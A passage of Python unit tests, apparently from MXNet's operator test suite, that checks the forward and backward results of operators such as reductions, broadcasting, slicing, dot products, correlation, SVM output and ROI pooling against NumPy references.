test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]: # for convenience of the test, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
    target_shape = (28, 28)
    src_shape = (42, 42)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
    data_array = np.zeros((1, 1) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
    executor.backward(mx.nd.ones((1, 1) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
for m in range(1, 5):
for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        continue  # for 1-D inputs the contraction size is fixed, so skip redundant k values
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
dtypes = ['float32', 'float64']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
                        a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
                        a_init_grad_npy = a_init_grad_npy.astype(data_type)
                        b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
                        b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
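    """NumPy reference for the Correlation forward pass; returns the output together
    with the zero-padded copies of both inputs, which the backward reference reuses."""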
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
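    """NumPy reference for the Correlation backward pass; returns the gradients w.r.t.
    data1 and data2, cropped back to the unpadded input shape."""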
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
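    """Run mx.sym.Correlation on random inputs and compare its forward and backward
    results against the NumPy reference implementations above."""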
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
                                        % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad.asnumpy())
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
